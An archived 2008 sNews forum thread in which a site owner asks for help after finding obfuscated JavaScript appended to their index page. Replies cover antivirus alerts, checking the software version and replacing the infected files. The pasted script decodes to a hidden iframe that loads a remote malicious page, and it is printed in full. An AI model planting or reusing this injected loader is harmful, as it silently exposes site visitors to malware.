Please login or register.

Login with username, password and session length
Advanced search  

News:

Latest sNews - sNews 1.7 - with its own forums - for discussion and user mods.

Author Topic: site loading problem  (Read 4139 times)

cletvs

  • Newbie
  • *
  • Karma: 0
  • Posts: 3
site loading problem
« on: November 11, 2008, 11:07:22 PM »

I am not sure where to post this, but here it is what happened to my site, I noticed couple of days ago that the site wasn't loading properly, but thought the server was slow, so didn't pay attention to this. Today, I found out that the site isn't loading at all but it was not loading at all. Had no clue what happened. After I downloaded the index file, it had this addition in it:
Code: [Select]
<html> <body><script>var source ="=jgsbnf!tsd>#iuuq;00usbggpl/do0pvu/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>
It was sitting right at the bottom of the page after the </html>. Since I found that, I cleaned so the site is working, but in an extremely strange manner. Site address: www.saintjw.com
Has anyone come across that kind of a problem?
« Last Edit: November 11, 2008, 11:10:55 PM by cletvs »
Logged

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6019
  • Semantically Challenged
    • snews.ca
Re: site loading problem
« Reply #1 on: November 12, 2008, 02:43:16 AM »

What version of sNews are you running on the domain linked above?
Have you downloaded the complete file-set from your server to a quarantine directory on your machine, for review, then upload a fresh file-set?

Two things happened to me.
1 - After loading your Home Page... Norton blocked a high-risk HTTP Malicious Toolkit Variant Activity which points to a Chinese location @ hu-hu.cn - IP 91.203.93.51.
2 - After loading your Calendar page... Norton blocked another high-risk attack coming from your calendar/calendar.php file. The risk name given is MSIE Apple QuickTime RTSP URI Remote BO... which could suggest there is a remote script trying to run out of that file.
Logged
Do it now... later may not come.
-------------------------------------------------------------------------------------------------
sNews 1.6 MESU | sNews 1.6 MEMU

cletvs

  • Newbie
  • *
  • Karma: 0
  • Posts: 3
Re: site loading problem
« Reply #2 on: November 12, 2008, 04:57:05 AM »

Thank you so much for a suggestion, I just scanned the backup copy, and it shows 8 files infected, I will proceed as instructed. Could the Mysql get infected as well?
Thanks a lot!
Logged

Keyrocks

  • Doug
  • ULTIMATE member
  • ******
  • Karma: 449
  • Posts: 6019
  • Semantically Challenged
    • snews.ca
Re: site loading problem
« Reply #3 on: November 12, 2008, 01:44:10 PM »

What version of sNews are you running on the domain linked above?
Is it 1.5.0, 1.5.3, 1.6 or 1.7?
Logged
Do it now... later may not come.
-------------------------------------------------------------------------------------------------
sNews 1.6 MESU | sNews 1.6 MEMU

Joost

  • Guest
Re: site loading problem
« Reply #4 on: November 12, 2008, 01:51:28 PM »

sNews 1.6, it seems.
Logged

cletvs

  • Newbie
  • *
  • Karma: 0
  • Posts: 3
Re: site loading problem
« Reply #5 on: November 13, 2008, 05:00:21 AM »

Yes, it's 1.6 version, and now it's running, after I cleaned that code out of few files, I did that manually, as I don't have an antivirus. I read about that attack, and found out that it was done through the server side.
Thank you again,
Cletvs
Logged